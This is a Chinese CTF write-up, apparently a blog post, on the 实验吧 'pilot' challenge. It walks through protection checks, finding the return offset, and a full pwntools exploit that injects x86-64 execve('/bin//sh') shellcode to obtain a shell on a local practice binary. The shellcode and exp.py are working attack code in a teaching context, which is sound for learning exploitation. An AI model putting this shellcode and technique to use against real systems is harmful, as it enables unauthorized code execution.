实验吧_pilot

本次实验旨在检验前期对栈溢出的掌握程度。给出了实验文件的百度网盘链接及提取码。实验步骤包括检验pilot保护机制,发现可进行栈溢出操作;对文件进行静态和动态分析,确定ret位置,编写payload,最终实现getshell,还附上了exp.py。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验目的

用过这次实验去检验我们前期对栈溢出的掌握程度

实验文件

链接:https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA
提取码:5d4d

实验步骤

首先对pilot的保护机制进行检验
在这里插入图片描述
发现程序没有开启任何保护,且有可读、可写、可执行段,说明我们可以进行栈溢出操作。

对文件进行静态分析:
在这里插入图片描述
其实pilot前面的一大段都没有什么用,我们只需要看输入函数read,因为可以进行no canary found,所以我们可以在这里进行栈溢出操作。

然后进行动态分析:
在这里插入图片描述

得到到ret的位置为0x40.。
所以我们可以编写payload:

p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'

最后就能进行getshell。

在这里插入图片描述
最后附上exp.py

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pilot')
#pwnlib.gdb.attach(p)
p.recvuntil('Location:')
buf_addr = int(p.recvuntil('\n')[:-1], 16)
p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
payload = shellcode + (40 - len(shellcode)) * 'A' + p64(buf_addr)
p.sendline(payload)
p.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值